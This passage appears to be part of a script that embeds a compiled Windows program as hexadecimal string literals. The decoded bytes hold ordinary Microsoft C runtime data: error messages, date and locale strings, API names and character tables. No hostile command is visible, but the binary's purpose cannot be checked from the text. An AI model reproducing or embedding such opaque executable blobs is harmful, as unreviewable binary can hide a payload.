'000000000007065726d697373696f6e2064656e69656400000066696c6520' \
'657869737473006e6f207375636820646576696365000066696c656e616d6' \
'520746f6f206c6f6e67000000646576696365206f72207265736f75726365' \
'206275737900696f206572726f72000000006469726563746f7279206e6f7' \
'420656d70747900696e76616c696420617267756d656e74000000006e6f20' \
'7370616365206f6e2064657669636500006e6f20737563682066696c65206' \
'f72206469726563746f727900000066756e6374696f6e206e6f7420737570' \
'706f7274656400006e6f206c6f636b20617661696c61626c650000006e6f7' \
'420656e6f756768206d656d6f72790000007265736f7572636520756e6176' \
'61696c61626c652074727920616761696e000063726f73732064657669636' \
'5206c696e6b0000006f7065726174696f6e2063616e63656c65640000746f' \
'6f206d616e792066696c6573206f70656e007065726d697373696f6e5f646' \
'56e696564000000616464726573735f696e5f757365000061646472657373' \
'5f6e6f745f617661696c61626c65000000616464726573735f66616d696c7' \
'95f6e6f745f737570706f7274656400000000636f6e6e656374696f6e5f61' \
'<KEY>' \
'57363726970746f7200636f6e6e656374696f6e5f61626f72746564000063' \
'6f6e6e656374696f6e5f726566757365640000636f6e6e656374696f6e5f7' \
'2657365740000000064657374696e6174696f6e5f616464726573735f7265' \
'717569726564000000006261645f6164647265737300686f73745f756e726' \
'561636861626c65000000006f7065726174696f6e5f696e5f70726f677265' \
'7373000000696e74657272757074656400696e76616c69645f617267756d6' \
'56e7400000000616c72656164795f636f6e6e6563746564000000746f6f5f' \
'6d616e795f66696c65735f6f70656e006d6573736167655f73697a6500000' \
'00066696c656e616d655f746f6f5f6c6f6e670000006e6574776f726b5f64' \
'6f776e000000006e6574776f726b5f72657365740000006e6574776f726b5' \
'f756e726561636861626c65006e6f5f6275666665725f7370616365006e6f' \
'5f70726f746f636f6c5f6f7074696f6e00006e6f745f636f6e6e656374656' \
'40000006e6f745f615f736f636b6574000000006f7065726174696f6e5f6e' \
'6f745f737570706f727465640070726f746f636f6c5f6e6f745f737570706' \
'f72746564000077726f6e675f70726f746f636f6c5f747970650074696d65' \
'645f6f75740000006f7065726174696f6e5f776f756c645f626c6f636b000' \
'000616464726573732066616d696c79206e6f7420737570706f7274656400' \
'0000006164647265737320696e20757365000061646472657373206e6f742' \
'0617661696c61626c65000000616c726561647920636f6e6e656374656400' \
'0000617267756d656e74206c69737420746f6f206c6f6e670000617267756' \
'd656e74206f7574206f6620646f6d61696e00006261642061646472657373' \
'006261642066696c652064657363726970746f7200626164206d657373616' \
'7650062726f6b656e207069706500636f6e6e656374696f6e2061626f7274' \
'65640000636f6e6e656374696f6e20616c726561647920696e2070726f677' \
'26573730000636f6e6e656374696f6e20726566757365640000636f6e6e65' \
'6374696f6e2072657365740000000064657374696e6174696f6e206164647' \
'26573732072657175697265640000000065786563757461626c6520666f72' \
'6d6174206572726f720066696c6520746f6f206c617267650000686f73742' \
'0756e726561636861626c65000000006964656e7469666965722072656d6f' \
'7665640000696c6c6567616c20627974652073657175656e6365000000696' \
'e617070726f70726961746520696f20636f6e74726f6c206f706572617469' \
'6f6e0000696e76616c6964207365656b00000000697320612064697265637' \
'46f727900006d6573736167652073697a65000000006e6574776f726b2064' \
'6f776e000000006e6574776f726b2072657365740000006e6574776f726b2' \
'0756e726561636861626c65006e6f20627566666572207370616365006e6f' \
'206368696c642070726f63657373000000006e6f206c696e6b006e6f206d6' \
'5737361676520617661696c61626c65000000006e6f206d65737361676500' \
'006e6f2070726f746f636f6c206f7074696f6e00006e6f2073747265616d2' \
'07265736f7572636573006e6f207375636820646576696365206f72206164' \
'64726573730000006e6f20737563682070726f63657373006e6f742061206' \
'469726563746f7279006e6f74206120736f636b6574000000006e6f742061' \
'2073747265616d000000006e6f7420636f6e6e65637465640000006e6f742' \
'0737570706f727465640000006f7065726174696f6e20696e2070726f6772' \
'6573730000006f7065726174696f6e206e6f74207065726d6974746564006' \
'f7065726174696f6e206e6f7420737570706f72746564006f706572617469' \
'6f6e20776f756c6420626c6f636b0000006f776e657220646561640000707' \
'26f746f636f6c206572726f72000070726f746f636f6c206e6f7420737570' \
'706f72746564000072656164206f6e6c792066696c652073797374656d000' \
'0007265736f7572636520646561646c6f636b20776f756c64206f63637572' \
'000000726573756c74206f7574206f662072616e6765007374617465206e6' \
'f74207265636f76657261626c6500000073747265616d2074696d656f7574' \
'0000746578742066696c652062757379000074696d6564206f75740000007' \
'46f6f206d616e792066696c6573206f70656e20696e2073797374656d0000' \
'00746f6f206d616e79206c696e6b730000746f6f206d616e792073796d626' \
'f6c6963206c696e6b206c6576656c7300000076616c756520746f6f206c61' \
'7267650077726f6e672070726f746f636f6c207479706500b027420094c04' \
'00058714200a87142001c000d000d000a0000a635002f003f00009500a447' \
'00e047e047e07700974800e048e048e08d00984900e049e049e08600994b0' \
'0e04be04be073009b4d00e04de04de074009d4f00e04fe04fe075009f5000' \
'e050e050e09100a05100e051e051e07600a15200e052e052e09200a25300e' \
'053e053e09300a300000000000000001b001b001b00000131002100000000' \
'783200400000030079330023000000007a340024000000007b35002500000' \
'0007c36005e001e00007d370026000000007e38002a000000007f39002800' \
'0000008030002900000000812d005f001f0000823d002b000000008308000' \
'8007f00000e0900000f0094000f7100510011000010770057001700001165' \
'0045000500001272005200120000137400540014000014790059001900001' \
'5750055001500001669004900090000176f004f000f000018700050001000' \
'00195b007b001b00001a5d007d001d00001b0d000d000a00001c000000000' \
'0000000610041000100001e730053001300001f6400440004000020660046' \
'0006000021670047000700002268004800080000236a004a000a0000246b0' \
'04b000b0000256c004c000c0000263b003a00000000272700220000000028' \
'60007e000000002900000000000000005c007c001c0000007a005a001a000' \
'02c780058001800002d630043000300002e760056001600002f6200420002' \
'0000306e004e000e0000316d004d000d0000322c003c00000000332e003e0' \
'0000000342f003f000000003500000000000000002a000000720000000000' \
'00000000000020002000200020000000000000000000003b0054005e00680' \
'03c0055005f0069003d00560060006a003e00570061006b003f0058006200' \
'6c004000590063006d0041005a0064006e0042005b0065006f0043005c006' \
'600700044005d006700710000000000000000000000000000000000473700' \
'0077000000483800008d0000004939000084000000002d0000000000004b3' \
'400007300000000350000000000004d36000074000000002b000000000000' \
'4f31000075000000503200009100000051330000760000005230000092000' \
'000532e000093000000000000000000000000000000000000000000000000' \
'0000e085e087e089e08be086e088e08ae08c526f496e697469616c697a650' \
'000000063006f006d0062006100730065002e0064006c006c000000526f55' \
'6e696e697469616c697a650000410044005600410050004900330032002e0' \
'044004c004c000000000053797374656d46756e6374696f6e303336000000' \
'f82742000cf240008bf24000556e6b6e6f776e20657863657074696f6e000' \
'00063736de001000000000000000000000003000000200593190000000000' \
'00000098b54100a4b54100b0b54100bcb541006a0061002d004a005000000' \
'07a0068002d0043004e0000006b006f002d004b00520000007a0068002d00' \
'54005700000053756e004d6f6e00547565005765640054687500467269005' \
'361740053756e64617900004d6f6e64617900005475657364617900576564' \
'6e65736461790000005468757273646179000000004672696461790000536' \
'1747572646179000000004a616e00466562004d617200417072004d617900' \
'4a756e004a756c0041756700536570004f6374004e6f7600446563004a616' \
'e75617279004665627275617279000000004d61726368000000417072696c' \
'0000004a756e65000000004a756c790000000041756775737400005365707' \
'4656d6265720000004f63746f626572004e6f76656d626572000000004465' \
'63656d62657200000000414d0000504d00004d4d2f64642f7979000000006' \
'46464642c204d4d4d4d2064642c20797979790048483a6d6d3a7373000000' \
'00530075006e0000004d006f006e000000540075006500000057006500640' \
'0000054006800750000004600720069000000530061007400000053007500' \
'6e00640061007900000000004d006f006e006400610079000000000054007' \
'5006500730064006100790000005700650064006e00650073006400610079' \
'0000005400680075007200730064006100790000000000460072006900640' \
'0610079000000000053006100740075007200640061007900000000004a00' \
'61006e00000046006500620000004d0061007200000041007000720000004' \
'd006100790000004a0075006e0000004a0075006c00000041007500670000' \
'0053006500700000004f006300740000004e006f007600000044006500630' \
'000004a0061006e0075006100720079000000460065006200720075006100' \
'72007900000000004d006100720063006800000041007000720069006c000' \
'0004a0075006e006500000000004a0075006c007900000000004100750067' \
'0075007300740000000000530065007000740065006d00620065007200000' \
'04f00630074006f0062006500720000004e006f00760065006d0062006500' \
'72000000000044006500630065006d006200650072000000000041004d000' \
'000000050004d00000000004d004d002f00640064002f0079007900000000' \
'0064006400640064002c0020004d004d004d004d002000640064002c00200' \
'079007900790079000000480048003a006d006d003a007300730000000000' \
'65006e002d00550053000000000000000102030405060708090a0b0c0d0e0' \
'f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d' \
'2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4' \
'c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a' \
'6b6c6d6e6f707172737475767778797a7b7c7d7e7f006b00650072006e006' \
'5006c00330032002e0064006c006c0000000000466c73416c6c6f63000000' \
'00466c734672656500466c7347657456616c756500466c7353657456616c7' \
'56500496e697469616c697a65437269746963616c53656374696f6e457800' \
'43726561746553656d6170686f72654578570000536574546872656164537' \
'461636b47756172616e74656500437265617465546872656164706f6f6c54' \
'696d6572000000536574546872656164706f6f6c54696d657200005761697' \
'4466f72546872656164706f6f6c54696d657243616c6c6261636b7300436c' \
'6f7365546872656164706f6f6c54696d65720000000043726561746554687' \
'2656164706f6f6c5761697400000000536574546872656164706f6f6c5761' \
'6974000000436c6f7365546872656164706f6f6c5761697400466c7573685' \
'0726f6365737357726974654275666665727300000000467265654c696272' \
'6172795768656e43616c6c6261636b52657475726e7300004765744375727' \
'2656e7450726f636573736f724e756d6265720000004765744c6f67696361' \
'6c50726f636573736f72496e666f726d6174696f6e0000437265617465537' \
'96d626f6c69634c696e6b570053657444656661756c74446c6c4469726563' \
'746f7269657300000000456e756d53797374656d4c6f63616c65734578004' \
'36f6d70617265537472696e6745780047657444617465466f726d61744578' \
'004765744c6f63616c65496e666f45780047657454696d65466f726d61744' \
'578004765745573657244656661756c744c6f63616c654e616d6500000000' \
'497356616c69644c6f63616c654e616d650000004c434d6170537472696e6' \
'7457800000047657443757272656e745061636b616765496400286e756c6c' \
'2900000000000006000006000100001000030600060210044545450505050' \
'5053530005000000000282038505807080037303057500700002020080000' \
'0000086068606060600000787078787878080708000007000808080000080' \
'0080007080000006d00730063006f007200650065002e0064006c006c0000' \
'00436f724578697450726f63657373000043004f004e0049004e002400000' \
'0000000000000050000c00b000000000000001d0000c00400000000000000' \
'960000c004000000000000008d0000c008000000000000008e0000c008000' \
'000000000008f0000c00800000000000000900000c0080000000000000091' \
'0000c00800000000000000920000c00800000000000000930000c00800000' \
'000000000b40200c00800000000000000b50200c008000000000000000c00' \
'0000900000000300000009000000520036003000300038000d000a002d002' \
'0006e006f007400200065006e006f00750067006800200073007000610063' \
'006500200066006f007200200061007200670075006d0065006e007400730' \
'00d000a00000000000000520036003000300039000d000a002d0020006e00' \
'6f007400200065006e006f007500670068002000730070006100630065002' \
'00066006f007200200065006e007600690072006f006e006d0065006e0074' \
'000d000a000000520036003000310030000d000a002d002000610062006f0' \
'07200740028002900200068006100730020006200650065006e0020006300' \
'61006c006c00650064000d000a0000000000520036003000310036000d000' \
'a002d0020006e006f007400200065006e006f007500670068002000730070' \
'00610063006500200066006f0072002000740068007200650061006400200' \
'064006100740061000d000a000000520036003000310037000d000a002d00' \
'200075006e006500780070006500630074006500640020006d0075006c007' \
'400690074006800720065006100640020006c006f0063006b002000650072' \
'0072006f0072000d000a000000000000000000520036003000310038000d0' \
'00a002d00200075006e006500780070006500630074006500640020006800' \
'65006100700020006500720072006f0072000d000a0000000000000000005' \
'20036003000310039000d000a002d00200075006e00610062006c00650020' \
'0074006f0020006f00700065006e00200063006f006e0073006f006c00650' \
'020006400650076006900630065000d000a00000000000000000052003600' \
'3000320034000d000a002d0020006e006f007400200065006e006f0075006' \
'7006800200073007000610063006500200066006f00720020005f006f006e' \
'0065007800690074002f00610074006500780069007400200074006100620' \
'06c0065000d000a000000000000000000520036003000320035000d000a00' \
'2d002000700075007200650020007600690072007400750061006c0020006' \
'60075006e006300740069006f006e002000630061006c006c000d000a0000' \
'0000000000520036003000320036000d000a002d0020006e006f007400200' \
'065006e006f00750067006800200073007000610063006500200066006f00' \
'7200200073007400640069006f00200069006e0069007400690061006c006' \
'9007a006100740069006f006e000d000a0000000000000000005200360030' \
'00320037000d000a002d0020006e006f007400200065006e006f007500670' \
'06800200073007000610063006500200066006f00720020006c006f007700' \
'69006f00200069006e0069007400690061006c0069007a006100740069006' \
'f006e000d000a000000000000000000520036003000320038000d000a002d' \
'00200075006e00610062006c006500200074006f00200069006e006900740' \
'0690061006c0069007a006500200068006500610070000d000a0000000000' \
'520036003000330030000d000a002d00200043005200540020006e006f007' \
'400200069006e0069007400690061006c0069007a00650064000d000a0000' \
'00000000000000520036003000330031000d000a002d00200041007400740' \
'065006d0070007400200074006f00200069006e0069007400690061006c00' \
'69007a0065002000740068006500200043005200540020006d006f0072006' \
'50020007400680061006e0020006f006e00630065002e000a005400680069' \
'007300200069006e006400690063006100740065007300200061002000620' \
'075006700200069006e00200079006f007500720020006100700070006c00' \
'690063006100740069006f006e002e000d000a00000000005200360030003' \
'30032000d000a002d0020006e006f007400200065006e006f007500670068' \
'00200073007000610063006500200066006f00720020006c006f006300610' \
'06c006500200069006e0066006f0072006d006100740069006f006e000d00' \
'0a0000000000520036003000330033000d000a002d0020004100740074006' \
'5006d0070007400200074006f00200075007300650020004d00530049004c' \
'00200063006f00640065002000660072006f006d002000740068006900730' \
'0200061007300730065006d0062006c007900200064007500720069006e00' \
'670020006e0061007400690076006500200063006f0064006500200069006' \
'e0069007400690061006c0069007a006100740069006f006e000a00540068' \
'0069007300200069006e00640069006300610074006500730020006100200' \
'0620075006700200069006e00200079006f00750072002000610070007000' \
'6c00690063006100740069006f006e002e002000490074002000690073002' \
'0006d006f007300740020006c0069006b0065006c00790020007400680065' \
'00200072006500730075006c00740020006f0066002000630061006c006c0' \
'069006e006700200061006e0020004d00530049004c002d0063006f006d00' \
'700069006c0065006400200028002f0063006c00720029002000660075006' \
'e006300740069006f006e002000660072006f006d002000610020006e0061' \
'007400690076006500200063006f006e007300740072007500630074006f0' \
'0720020006f0072002000660072006f006d00200044006c006c004d006100' \
'69006e002e000d000a0000000000520036003000330034000d000a002d002' \
'00069006e0063006f006e00730069007300740065006e00740020006f006e' \
'006500780069007400200062006500670069006e002d0065006e006400200' \
'07600610072006900610062006c00650073000d000a000000000044004f00' \
'4d00410049004e0020006500720072006f0072000d000a000000000053004' \
'9004e00470020006500720072006f0072000d000a000000000054004c004f' \
'005300530020006500720072006f0072000d000a000000720075006e00740' \
'069006d00650020006500720072006f00720020000000000002000000a8c6' \
'41000800000070bd410009000000c8bd41000a00000020be4100100000006' \
'8be410011000000c0be41001200000020bf41001300000068bf4100180000' \
'00c0bf41001900000030c041001a00000080c041001b000000f0c041001c0' \
'0000060c141001e000000acc141001f000000f0c1410020000000b8c24100' \
'2100000020c341002200000010c541007800000078c541007900000098c54' \
'1007a000000b4c54100fc000000a4014200ff000000d0c541005200360030' \
'00300032000d000a002d00200066006c006f006100740069006e006700200' \
'070006f0069006e007400200073007500700070006f007200740020006e00' \
'6f00740020006c006f0061006400650064000d000a0000000000520075006' \
'e00740069006d00650020004500720072006f00720021000a000a00500072' \
'006f006700720061006d003a00200000003c00700072006f0067007200610' \
'06d0020006e0061006d006500200075006e006b006e006f0077006e003e00' \
'000000002e002e002e0000000a000a00000000004d006900630072006f007' \
'3006f00660074002000560069007300750061006c00200043002b002b0020' \
'00520075006e00740069006d00650020004c0069006200720061007200790' \
'0000000007c5b41000c2842002d5c41008bf2400062616420657863657074' \
'696f6e0000000000000070c941007cc9410084c9410090c941009cc94100a' \
'8c94100b4c94100c0c94100c8c94100d0c94100dcc94100e8c94100f2c941' \
'00a0ce4100b4ce4100d0ce4100e4ce410004cf4100f4c94100fcc9410004c' \
'a410008ca41000cca410010ca410014ca410018ca41001cca410020ca4100' \
'2cca410030ca410034ca410038ca41003cca410040ca410044ca410048ca4' \
'1004cca410050ca410054ca410058ca41005cca410060ca410064ca410068' \
'ca41006cca410070ca410074ca410078ca41007cca410080ca410084ca410' \
'088ca41008cca410090ca410094ca410098ca41009cca4100a0ca4100a4ca' \
'4100a8ca4100b4ca4100c0ca4100c8ca4100d4ca4100ecca4100f8ca41000' \
'ccb41002ccb41004ccb41006ccb41008ccb4100accb4100d0cb4100eccb41' \
'0010cc410030cc410058cc410074cc410084cc410088cc410090cc4100a0c' \
'c4100c4cc4100cccc4100d8cc4100e8cc410004cd410024cd41004ccd4100' \
'74cd41009ccd4100c8cd4100e4cd410008ce41002cce410058ce410084ce4' \
'100f2c941005f5f626173656428000000005f5f636465636c005f5f706173' \
'63616c000000005f5f73746463616c6c0000005f5f7468697363616c6c000' \
'05f5f6661737463616c6c00005f5f636c7263616c6c0000005f5f65616269' \
'00005f5f7074723634005f5f726573747269637400005f5f756e616c69676' \
'e656400726573747269637428000000206e6577000000002064656c657465' \
'003d0000003e3e00003c3c0000210000003d3d0000213d00005b5d00006f7' \
'0657261746f72000000002d3e00002a0000002b2b00002d2d00002d000000' \
'2b000000260000002d3e2a002f000000250000003c0000003c3d00003e000' \
'0003e3d00002c000000282900007e0000005e0000007c000000262600007c' \
'7c00002a3d00002b3d00002d3d00002f3d0000253d00003e3e3d003c3c3d0' \
'0263d00007c3d00005e3d00006076667461626c6527000000607662746162' \
'6c6527000000607663616c6c270060747970656f662700000000606c6f636' \
'16c20737461746963206775617264270000000060737472696e6727000000' \
'006076626173652064657374727563746f7227000060766563746f7220646' \
'56c6574696e672064657374727563746f7227000000006064656661756c74' \
'20636f6e7374727563746f7220636c6f7375726527000000607363616c617' \
'22064656c6574696e672064657374727563746f7227000000006076656374' \
'6f7220636f6e7374727563746f72206974657261746f72270000006076656' \
'3746f722064657374727563746f72206974657261746f7227000000006076' \
'6563746f7220766261736520636f6e7374727563746f72206974657261746' \
'f722700607669727475616c20646973706c6163656d656e74206d61702700' \
'0060656820766563746f7220636f6e7374727563746f72206974657261746' \
'f72270000000060656820766563746f722064657374727563746f72206974' \
'657261746f72270060656820766563746f7220766261736520636f6e73747' \
'27563746f72206974657261746f7227000060636f707920636f6e73747275' \
'63746f7220636c6f73757265270000607564742072657475726e696e67270' \
'0604548006052545449000000606c6f63616c2076667461626c652700606c' \
'6f63616c2076667461626c6520636f6e7374727563746f7220636c6f73757' \
'2652700206e65775b5d00002064656c6574655b5d000000606f6d6e692063' \
'616c6c73696727000060706c6163656d656e742064656c65746520636c6f7' \
'375726527000060706c6163656d656e742064656c6574655b5d20636c6f73' \
'7572652700000000606d616e6167656420766563746f7220636f6e7374727' \
'563746f72206974657261746f7227000000606d616e616765642076656374' \
'6f722064657374727563746f72206974657261746f7227000000006065682' \
'0766563746f7220636f707920636f6e7374727563746f7220697465726174' \
'6f722700000060656820766563746f7220766261736520636f707920636f6' \
'e7374727563746f72206974657261746f7227006064796e616d696320696e' \
'697469616c697a657220666f72202700006064796e616d696320617465786' \
'9742064657374727563746f7220666f7220270000000060766563746f7220' \
'636f707920636f6e7374727563746f72206974657261746f7227000060766' \
'563746f7220766261736520636f707920636f6e7374727563746f72206974' \
'657261746f722700000000606d616e6167656420766563746f7220636f707' \
'920636f6e7374727563746f72206974657261746f72270000606c6f63616c' \
'2073746174696320746872656164206775617264270020547970652044657' \
'363726970746f7227000000204261736520436c6173732044657363726970' \
'746f72206174202800204261736520436c617373204172726179270000204' \
'36c617373204869657261726368792044657363726970746f722700000000' \
'20436f6d706c657465204f626a656374204c6f6361746f722700000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000200020002000200020002000200020002000280028' \
'0028002800280020002000200020002000200020002000200020002000200' \
'0200020002000200020002000480010001000100010001000100010001000' \
'1000100010001000100010001000840084008400840084008400840084008' \
'4008400100010001000100010001000100081008100810081008100810001' \
'0001000100010001000100010001000100010001000100010001000100010' \
'0010001000100010010001000100010001000100082008200820082008200' \
'8200020002000200020002000200020002000200020002000200020002000' \
'2000200020002000200020010001000100010002000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000200020002000200020002000200020002000680028002800280' \
'0280020002000200020002000200020002000200020002000200020002000' \
'2000200020002000480010001000100010001000100010001000100010001' \
'0001000100010001000840084008400840084008400840084008400840010' \
'0010001000100010001000100081018101810181018101810101010101010' \
'1010101010101010101010101010101010101010101010101010101010101' \
'0101010110001000100010001000100082018201820182018201820102010' \
'2010201020102010201020102010201020102010201020102010201020102' \
'0102010201020110001000100010002000200020002000200020002000200' \
'0200020002000200020002000200020002000200020002000200020002000' \
'2000200020002000200020002000200020002000480010001000100010001' \
'0001000100010001000100010001000100010001000100010001400140010' \
'0010001000100010001400100010001000100010001000010101010101010' \
'1010101010101010101010101010101010101010101010101010101010101' \
'0101010101010101100001010101010101010101010101010201020102010' \
'2010201020102010201020102010201020102010201020102010201020102' \
'0102010201020102010201100002010201020102010201020102010201010' \
'100000000808182838485868788898a8b8c8d8e8f90919293949596979899' \
'9a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b' \
'8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6' \
'd7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f' \
'5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f10111213' \
'1415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f30313' \
'2333435363738393a3b3c3d3e3f406162636465666768696a6b6c6d6e6f70' \
'7172737475767778797a5b5c5d5e5f606162636465666768696a6b6c6d6e6' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'cbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e' \
'9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff8081828384858687' \
'<KEY>' \
'<KEY>' \
'c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e' \
'3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff0001' \
'02030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f2' \
'<KEY>' \
'<KEY>' \
'd5e5f604142434445464748494a4b4c4d4e4f505152535455565758595a7b' \
'7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999' \
'a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8' \
'b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d' \
'7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5' \
'f6f7f8f9fafbfcfdfeff0100000068e541000200000070e54100030000007' \
'8e541000400000080e541000500000090e541000600000098e54100070000' \
'00a0e5410008000000a8e5410009000000b0e541000a000000b8e541000b0' \
'00000c0e541000c000000c8e541000d000000d0e541000e000000d8e54100' \
'0f000000e0e5410010000000e8e5410011000000f0e5410012000000f8e54' \
'1001300000000e641001400000008e641001500000010e641001600000018' \
'e641001800000020e641001900000028e641001a00000030e641001b00000' \
'038e641001c00000040e641001d00000048e641001e00000050e641001f00' \
'000058e641002000000060e641002100000068e641002200000070e641002' \
'300000078e641002400000080e641002500000088e641002600000090e641' \
'002700000098e6410029000000a0e641002a000000a8e641002b000000b0e' \
'641002c000000b8e641002d000000c0e641002f000000c8e6410036000000' \
'd0e6410037000000d8e6410038000000e0e6410039000000e8e641003e000' \
'000f0e641003f000000f8e641004000000000e741004100000008e7410043' \
'00000010e741004400000018e741004600000020e741004700000028e7410' \
'04900000030e741004a00000038e741004b00000040e741004e00000048e7' \
'41004f00000050e741005000000058e741005600000060e74100570000006' \
'8e741005a00000070e741006500000078e741007f00000030014200010400' \
'0080e74100020400008ce741000304000098e7410004040000bcb54100050' \
'40000a4e7410006040000b0e7410007040000bce7410008040000c8e74100' \
'0904000018b941000b040000d4e741000c040000e0e741000d040000ece74' \
'1000e040000f8e741000f04000004e841001004000010e841001104000098' \
'b5410012040000b0b54100130400001ce841001404000028e841001504000' \
'034e841001604000040e84100180400004ce841001904000058e841001a04' \
'000064e841001b04000070e841001c0400007ce841001d04000088e841001' \
'e04000094e841001f040000a0e8410020040000ace8410021040000b8e841' \
'0022040000c4e8410023040000d0e8410024040000dce8410025040000e8e' \
'8410026040000f4e841002704000000e94100290400000ce941002a040000' \
'18e941002b04000024e941002c04000030e941002d04000048e941002f040' \
'00054e941003204000060e94100340400006ce941003504000078e9410036' \
'04000084e941003704000090e94100380400009ce9410039040000a8e9410' \
'03a040000b4e941003b040000c0e941003e040000cce941003f040000d8e9' \
'410040040000e4e9410041040000f0e9410043040000fce94100440400001' \
'4ea41004504000020ea4100460400002cea41004704000038ea4100490400' \
'0044ea41004a04000050ea41004b0400005cea41004c04000068ea41004e0' \
'4000074ea41004f04000080ea4100500400008cea41005204000098ea4100' \
'56040000a4ea410057040000b0ea41005a040000c0ea410065040000d0ea4' \
'1006b040000e0ea41006c040000f0ea410081040000fcea41000108000008' \
'eb410004080000a4b541000708000014eb41000908000020eb41000a08000' \
'02ceb41000c08000038eb41001008000044eb41001308000050eb41001408' \
'00005ceb41001608000068eb41001a08000074eb41001d0800008ceb41002' \
'c08000098eb41003b080000b0eb41003e080000bceb410043080000c8eb41' \
'006b080000e0eb4100010c0000f0eb4100040c0000fceb4100070c000008e' \
'c4100090c000014ec41000a0c000020ec41000c0c00002cec41001a0c0000' \
'38ec41003b0c000050ec41006b0c00005cec4100011000006cec410004100' \
'00078ec41000710000084ec41000910000090ec41000a1000009cec41000c' \
'100000a8ec41001a100000b4ec41003b100000c0ec410001140000d0ec410' \
'004140000dcec410007140000e8ec410009140000f4ec41000a14000000ed' \
'41000c1400000ced41001a14000018ed41003b14000030ed4100011800004' \
'0ed4100091800004ced41000a18000058ed41000c18000064ed41001a1800' \
'0070ed41003b18000088ed4100011c000098ed4100091c0000a4ed41000a1' \
'c0000b0ed41001a1c0000bced41003b1c0000d4ed410001200000e4ed4100' \
'09200000f0ed41000a200000fced41003b20000008ee41000124000018ee4' \
'1000924000024ee41000a24000030ee41003b2400003cee4100012800004c' \
'ee41000928000058ee41000a28000064ee4100012c000070ee4100092c000' \
'07cee41000a2c000088ee41000130000094ee410009300000a0ee41000a30' \
'0000acee410001340000b8ee410009340000c4ee41000a340000d0ee41000' \
'1380000dcee41000a380000e8ee4100013c0000f4ee41000a3c000000ef41' \
'00014000000cef41000a40000018ef41000a44000024ef41000a48000030e' \
'f41000a4c00003cef41000a50000048ef4100047c000054ef41001a7c0000' \
'64ef41003001420042000000d0e641002c0000006cef41007100000068e54' \
'1000000000078ef4100d800000084ef4100da00000090ef4100b10000009c' \
'ef4100a0000000a8ef41008f000000b4ef4100cf000000c0ef4100d500000' \
'0ccef4100d2000000d8ef4100a9000000e4ef4100b9000000f0ef4100c400' \
'0000fcef4100dc00000008f041004300000014f04100cc00000020f04100b' \
'f0000002cf04100c8000000b8e641002900000038f041009b00000050f041' \
'006b00000078e641002100000068f041006300000070e541000100000074f' \
'041004400000080f041007d0000008cf04100b700000078e5410002000000' \
'a4f041004500000090e5410004000000b0f0410047000000bcf0410087000' \
'00098e5410005000000c8f0410048000000a0e5410006000000d4f04100a2' \
'000000e0f0410091000000ecf0410049000000f8f04100b300000004f1410' \
'0ab00000078e741004100000010f141008b000000a8e541000700000020f1' \
'41004a000000b0e54100080000002cf14100a300000038f14100cd0000004' \
'4f14100ac00000050f14100c90000005cf141009200000068f14100ba0000' \
'0074f14100c500000080f14100b40000008cf14100d600000098f14100d00' \
'00000a4f141004b000000b0f14100c0000000bcf14100d3000000b8e54100' \
'09000000c8f14100d1000000d4f14100dd000000e0f14100d7000000ecf14' \
'100ca000000f8f14100b500000004f24100c100000010f24100d40000001c' \
'f24100a400000028f24100ad00000034f24100df00000040f241009300000' \
'04cf24100e000000058f24100bb00000064f24100ce00000070f24100e100' \
'00007cf24100db00000088f24100de00000094f24100d9000000a0f24100c' \
'600000088e6410023000000acf2410065000000c0e641002a000000b8f241' \
'006c000000a0e6410026000000c4f2410068000000c0e541000a000000d0f' \
'241004c000000e0e641002e000000dcf2410073000000c8e541000b000000' \
'e8f2410094000000f4f24100a500000000f34100ae0000000cf341004d000' \
'00018f34100b600000024f34100bc00000060e741003e00000030f3410088' \
'00000028e74100370000003cf341007f000000d0e541000c00000048f3410' \
'04e000000e8e641002f00000054f341007400000030e641001800000060f3' \
'4100af0000006cf341005a000000d8e541000d00000078f341004f000000b' \
'0e641002800000084f341006a00000068e641001f00000090f34100610000' \
'00e0e541000e0000009cf3410050000000e8e541000f000000a8f34100950' \
'00000b4f3410051000000f0e5410010000000c0f3410052000000d8e64100' \
'2d000000ccf3410072000000f8e6410031000000d8f341007800000040e74' \
'1003a000000e4f3410082000000f8e541001100000068e741003f000000f0' \
'f341008900000000f441005300000000e74100320000000cf441007900000' \
'098e641002500000018f441006700000090e641002400000024f441006600' \
